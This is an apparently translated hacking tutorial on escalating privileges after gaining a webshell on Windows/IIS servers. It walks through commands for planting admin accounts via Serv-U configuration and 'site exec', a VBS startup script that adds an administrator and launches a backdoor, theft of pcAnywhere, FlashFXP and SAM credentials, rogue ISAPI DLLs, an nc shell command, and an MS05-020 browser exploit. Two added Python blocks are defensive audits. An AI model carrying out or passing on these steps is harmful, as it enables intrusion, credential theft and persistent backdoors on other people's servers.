Classic webshell Elevation of Privilege

Source: Internet
Author: User
Tags: pcanywhere

Now that we have a webshell,
of course I still want to go on and get admin permission on the whole server; a hacker who doesn't want admin permission is no good hacker ~
Hee ~~ Come with me and see what can be used to escalate privileges.
********************************************************************************
First
If pcAnywhere Server is installed on the server (administrators install it for convenient management),
it gives us convenience too: download the *.CIF files under Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/
on the system disk to the local machine. Once they are cracked, connecting with pcAnywhere will work.
********************************************************************************
Second
A lot of people have asked me how to raise the IIS user permission of a webshell.
Generally, server management is done on the local machine and the files are uploaded to the web space,
which is done over FTP, and Serv-U is the most widely used FTP server.
So we can use Serv-U to raise our privileges.
To raise privileges through Serv-U, the Serv-U installation directory needs to be writable ~

First, go to the Serv-U installation folder through the webshell, find servudaemon.ini and download it.
Then install Serv-U on the local machine and overwrite servudaemon.ini in the local installation folder with it.
Start Serv-U and add a user, set it as a system administrator with home directory c:/ and execute permission.
Then upload the modified servudaemon.ini back to the Serv-U installation directory on the server.

Connect with the new user and password ~
Okay, it connects.
ftp
ftp> open IP
Connected to IP.
220 Serv-U FTP Server v5.0.0.4 for WinSock ready...
User (IP:(none)): id            // the user you just added
331 User name okay, please send complete E-mail address as password.
Password: password              // the password
230 User logged in, proceed.
ftp> cd winnt                   // enter the WINNT directory of Win2k
250 Directory changed to /winnt
ftp> cd system32                // enter the System32 directory
250 Directory changed to /winnt/system32
ftp> quote site exec net.exe user Rover rover1234 /add   // use the system's net.exe to add a user

If you are told that you do not have the permission,
upload the backdoor (server.exe) to the System32 directory,
then write a VBS script:
Set wshshell = CreateObject("WScript.Shell")
a = wshshell.Run("cmd.exe /c net user user pass /add", 0)
b = wshshell.Run("cmd.exe /c net localgroup administrators user /add", 0)
b = wshshell.Run("cmd.exe /c server.exe", 0)

Save it as xx.vbe.
What this script does is create the user with the password pass,
promote it to administrator,
and then run server.exe from the system32 directory.
Put this script in the C:/Documents and Settings/All Users/Start Menu/Program/
directory.
That way the administrator will run the script as soon as he logs in.
The next step is to wait. Wait for him to log on.
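An added example, not part of the original post: a defender-side audit of a downloaded servudaemon.ini that flags accounts like the one described above (system maintenance privilege, home directory at a drive root, execute permission on that root). The [USER=name|1], HomeDir, Maintenance and AccessN=dir|flags keys follow the Serv-U 5/6 ini layout as I remember it and are an assumption; the sample file is constructed.

```python
import configparser
import ntpath

# Constructed sample in the ServUDaemon.ini layout of Serv-U 5/6; the key
# names ([USER=<name>|1], HomeDir, Maintenance, AccessN=<dir>|<flags>) are
# an assumption from memory, so check them against a real file first.
SAMPLE_INI = """
[USER=webmaster|1]
Password=xx00000000000000000000000000000000
HomeDir=D:\\wwwroot
Access1=D:\\wwwroot|RWAMELCDP

[USER=rover|1]
Password=xx00000000000000000000000000000000
HomeDir=c:\\
Maintenance=System
Access1=c:\\|RWAMELCDP
"""

def is_drive_root(path: str) -> bool:
    """True for 'c:\\', 'C:/' or 'c:': the whole drive is exposed."""
    drive, rest = ntpath.splitdrive(path.strip())
    return bool(drive) and rest in ("", "\\", "/")

def audit_servu_ini(text: str) -> dict:
    """Return {user: [reasons]} for accounts that look like planted admin
    backdoors: system maintenance rights, drive-root home, 'E' on a root."""
    cp = configparser.RawConfigParser(strict=False)
    cp.optionxform = str  # keep key case so 'Access1' stays readable
    cp.read_string(text)
    findings = {}
    for section in cp.sections():
        if not section.upper().startswith("USER="):
            continue
        user = section[5:].split("|", 1)[0]
        reasons = []
        if cp.get(section, "Maintenance", fallback="").lower() == "system":
            reasons.append("system maintenance privilege")
        if is_drive_root(cp.get(section, "HomeDir", fallback="")):
            reasons.append("home directory is a drive root")
        for key, value in cp.items(section):
            if key.startswith("Access") and "|" in value:
                directory, flags = value.rsplit("|", 1)
                if "E" in flags.upper() and is_drive_root(directory):
                    reasons.append(f"execute permission on {directory}")
        if reasons:
            findings[user] = reasons
    return findings
```

Run it against a copy of the real file and compare the flagged accounts with the ones the administrator actually created.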
********************************************************************************
Third
Check the system services, the programs that start automatically with the system, and the software administrators use frequently, such as Norton, vadministrator, Kingsoft, Rising, WinRAR and even QQ: are any of them writable? If so, modify the program, bind a batch file or VBS to it, and wait for the server to restart.
********************************************************************************
Fourth
Find the conn and config files and read them to see whether you can get the SA or MySQL password,
and so on.
********************************************************************************
Fifth
FlashFXP can also be used to raise privileges, but the success rate depends on your luck.
First, find the FlashFXP folder and open (edit) sites.dat. This file contains the user names and passwords;
the passwords are encrypted. Copy these files back to your local machine and replace the local files with them. Then you will find that your Site Manager is the same as the one opened in FlashFXP on the site. You can add n more bots ~~ Hee ~

Huh?? No, this is about raising privileges. Don't give up halfway.
Let's look at the other administrator's Site Manager. The user name and password are shown as asterisks. You can use an XP asterisk password viewer to view them, and the passwords that are encrypted in sites.dat are displayed in plain text. Then the administrator's site passwords are all retrieved.
Next, you can connect to these new servers ~~
After testing, you only need to replace the corresponding local file with the sites.dat file containing the passwords and user names
to restore the passwords of each of the administrator's sites.
********************************************************************************
Sixth

On Win2k + IIS 5.0 the application protection option is "Medium (Pooled)" by default. In that case an ISAPI loaded by IIS
runs under the identity of the IWAM_computername user.
However, by default Win2k + IIS 5 must load some special ISAPIs as SYSTEM. Win2k + IIS 5,
Win2k + IIS 5 + SP1 and Win2k + IIS 5 + SP2 decide this by a simple check of the ISAPI file name, with no directory restriction.
The ISAPIs loaded with SYSTEM permission are:
1. idq.dll
2. httpext.dll
3. httpodbc.dll
4. ssinc.dll
5. msw3prt.dll
6. author.dll
7. admin.dll
8. shtml.dll
9. sspifilt.dll
10. compfilt.dll
11. pwsdata.dll
12. md5filt.dll
13. fpexedll.dll

Therefore it is easy to obtain SYSTEM permission. There is also a bug in how the file name is determined: a request for /scripts/test%81%5cssinc.dll will also be treated as a request for ssinc.dll, that is, the double-byte Far East versions are not taken into account when the file path is split. ssinc.dll also has a problem when processing the path of included files, in that it treats only one of "/" and "\" as a separator; if the other one is used in the request, file paths can be handled incorrectly, which may cause information leakage or privilege vulnerabilities. Many other products (such as PHP and ASP) have similar vulnerabilities.

Loading these ISAPIs should be decided by the full path, not just the file name; this ought to be corrected.
Generally, the following paths are used by default:
1. idq.dll D:/winnt/system32/idq.dll
2. httpext.dll D:/winnt/system32/inetsrv/httpext.dll
3. httpodbc.dll D:/winnt/system32/inetsrv/httpodbc.dll
4. ssinc.dll D:/winnt/system32/inetsrv/ssinc.dll
5. msw3prt.dll D:/winnt/system32/msw3prt.dll
6. author.dll D:/program files/common files/Microsoft shared/Web Server Extensions/40/ISAPI/_vti_aut/author.dll
7. admin.dll D:/program files/common files/Microsoft shared/Web Server Extensions/40/ISAPI/_vti_adm/admin.dll
8. shtml.dll D:/program files/common files/Microsoft shared/Web Server Extensions/40/ISAPI/shtml.dll
9. sspifilt.dll D:/winnt/system32/inetsrv/sspifilt.dll
10. compfilt.dll D:/winnt/system32/inetsrv/compfilt.dll
11. pwsdata.dll D:/winnt/system32/inetsrv/pwsdata.dll
12. md5filt.dll D:/winnt/system32/inetsrv/md5filt.dll
13. fpexedll.dll D:/program files/common files/Microsoft shared/Web Server Extensions/40/bin/fpexedll.dll

Under normal circumstances none of these paths is writable by guests, but if the permissions are badly configured and the IIS user can write to these paths, privileges can be elevated.

You can upload isapihack.dll to an executable directory of IIS, named ssinc.dll or admin.dll (one of the 13 file names listed above).
Then wait for IIS to restart and load the DLL, and you obtain the permission.
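As an added example (not from the original post), here is the full-path allow-list the text says the check should use, beside the name-only rule it criticises, plus the byte-level versus code-page-aware split that the %81%5c case turns on. The D: install paths are the ones listed above; the drive letter and cp936 as the server's code page are assumptions.

```python
import ntpath

# The 13 ISAPI extensions IIS 5 loads as SYSTEM, with the install paths from
# the list above (the D: drive and the install root are assumptions; a real
# host may differ, so build this set from the actual metabase/filesystem).
SYSTEM_ISAPI = [
    r"D:\winnt\system32\idq.dll",
    r"D:\winnt\system32\inetsrv\httpext.dll",
    r"D:\winnt\system32\inetsrv\httpodbc.dll",
    r"D:\winnt\system32\inetsrv\ssinc.dll",
    r"D:\winnt\system32\msw3prt.dll",
    r"D:\program files\common files\microsoft shared\web server extensions\40\isapi\_vti_aut\author.dll",
    r"D:\program files\common files\microsoft shared\web server extensions\40\isapi\_vti_adm\admin.dll",
    r"D:\program files\common files\microsoft shared\web server extensions\40\isapi\shtml.dll",
    r"D:\winnt\system32\inetsrv\sspifilt.dll",
    r"D:\winnt\system32\inetsrv\compfilt.dll",
    r"D:\winnt\system32\inetsrv\pwsdata.dll",
    r"D:\winnt\system32\inetsrv\md5filt.dll",
    r"D:\program files\common files\microsoft shared\web server extensions\40\bin\fpexedll.dll",
]

def canonical(path: str) -> str:
    """Collapse '.', '..' and mixed separators and lower-case the result so
    that two spellings of one NTFS file compare equal."""
    return ntpath.normcase(ntpath.normpath(path))

ALLOWED_PATHS = {canonical(p) for p in SYSTEM_ISAPI}
ALLOWED_NAMES = {ntpath.basename(p) for p in ALLOWED_PATHS}

def name_only_check(path: str) -> bool:
    """The flawed rule the text describes: trust the file name wherever it is."""
    return ntpath.basename(canonical(path)) in ALLOWED_NAMES

def path_check(path: str) -> bool:
    """The corrected rule: only the exact installed file qualifies."""
    return ntpath.isabs(path) and canonical(path) in ALLOWED_PATHS

def basename_bytewise(raw: bytes) -> str:
    """Split on the 0x5C byte, as a DBCS-unaware server does."""
    return raw.rsplit(b"\\", 1)[-1].decode("latin-1")

def basename_dbcs(raw: bytes, codepage: str = "cp936") -> str:
    """Decode with the system code page first, so a trail byte 0x5C inside a
    double-byte character is not mistaken for a path separator."""
    return ntpath.basename(raw.decode(codepage))
```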
********************************************************************************
Seventh

Download the %WINDIR%/repair/sam.* file (sam._ on NT 4 and sam on Windows 2000),
then crack it with software such as L0pht. As long as it can be obtained, cracking it is only a matter of time.
********************************************************************************
Eighth
PipeUpAdmin (on Windows 2000) adds the current user account to the Administrators group when run on the local machine. Normal users and users in the Guests group can run it successfully.
********************************************************************************
Ninth
Serv-U FTP Server local privilege escalation vulnerability:
On many hosts you do not have permission to upload and run the exploit directly. Upload the Serv-U local exploit and nc, put the su.exe file in C:/users and settings/all users/users, then use su.exe to create a user directly, or bounce back a shell.
Specific commands:
Create a user: serv-u.exe "cmd"
> user XL
> pass 111111

Reverse shell: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"

A good new method for privilege escalation
Today I want to bring you a new way to get SYSTEM permission after we get a webshell. Raising privileges is already commonplace and there are many elevation methods on the net, so I will not repeat them here. Today I will show you how to actively use the MS05-020 vulnerability to achieve our goal of elevating privileges.
MS05-020 is an IE vulnerability. Microsoft published this bulletin in April 2005:
Security Vulnerability CN-VA05-025
Release date:
Vulnerability Type: Remote Code Execution
Vulnerability assessment: High Risk
Affected Versions:
Microsoft Windows 2000 Service Pack 3 and Microsoft Windows 2000 Service Pack 4
Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2
Microsoft Windows XP 64-bit Edition Service Pack 1 (Itanium)
Microsoft Windows XP 64-bit Edition 2003 (Itanium)
Microsoft Windows Server 2003
Microsoft Windows Server 2003 (for Itanium-based systems); Microsoft Windows 98, Microsoft Windows 98 Second Edition (SE) and Microsoft Windows Millennium Edition (Me). Tested Microsoft Windows components:
Vulnerability description:
Internet Explorer has a remote code execution vulnerability in the way it processes certain DHTML objects. An attacker can exploit this vulnerability by constructing a malicious web page. If a user visits the malicious website, the malicious web page may allow remote code execution. An attacker who successfully exploits this vulnerability can take complete control of the affected system. Internet Explorer has a remote code execution vulnerability in the way it processes URLs. An attacker can exploit this vulnerability by constructing a malicious web page. If a user visits the malicious website, the malicious web page may allow remote code execution. An attacker who successfully exploits this vulnerability can take complete control of the affected system. Internet Explorer has a remote code execution vulnerability in the way it processes Content Advisor rating files. An attacker can exploit this vulnerability by constructing a specially crafted rating file. If a user visits a malicious website or views a malicious e-mail and accepts the installation of this malicious rating file, the file may allow remote code execution. An attacker who successfully exploits this vulnerability can take complete control of the affected system. However, exploiting this vulnerability requires a large amount of user interaction.

Have you read the vulnerability description above? The victim is attacked simply by browsing. We usually use an IE vulnerability by first putting an attack page on the Internet and then waiting for others to browse it, so that their browser gets attacked.
Today we want to raise our own privileges, so naturally we want a host with higher privileges to browse the vulnerable page. How can we make the host browse this page after we get a webshell?
The exploit page for MS05-020 has been released. You can go to:
http://www.eviloctal.com/forum/read.php?tid=10127
to download it. Suppose we have put this exploit at http://www.xxxx.com/ms05020.html.
Next we will use this exploit: go to our ASP Trojan and open a shell. If it cannot be used, find another way (you can upload a cmd.exe by yourself).
Enter start http://www.xxxx.com/ms05020.html on the command line and click execute.

At this point the host's IE will visit our ms05020.html. If the host is not patched, a shell will be bound to port 28876 on the host.
Next, enter netstat -an | find "28876" to check whether the binding succeeded. The first time, the binding is slower; you have to wait a bit and it will succeed soon. Then we can telnet in and it works immediately.

You can see: (I added a temp administrator)

Now we have SYSTEM permission. What else do you want to do?

Note: you can upload nc first and connect back to your own machine, then enter:
start http://www.xxx.com/ms05020.html
If possible you can also enter:
start "C:/program files/Internet Explorer/iexplore.exe" http://www.xxx.com/ms05020.htm
This depends on your situation. Generally, if the virtual host allows it, you should use the first command!
I have tested 2k Pro, 2k Server (2000 Enterprise Terminal Server) and 2003! But there were also failures, and the failure rate is quite high, especially on virtual hosts. Once I did not succeed, then I opened 3389 and found that IE did not pop up; instead the Internet Explorer setup wizard appeared, which means the server cannot access the network without Internet settings configured for Internet Explorer. In fact I have not figured out under what circumstances it succeeds, because start http://www.xxx.com/xxx.exe always succeeds
and downloads xxx.exe to its machine! I finally think this is related to the ms05020.htm file. Ah, it seems the value of this method is rather small, and I did not want to publish it. Since it is written, I may as well put it out! I just discussed it with Invincible, and he also said the cause of the failure is probably the same: the system has the IE patch installed.

 
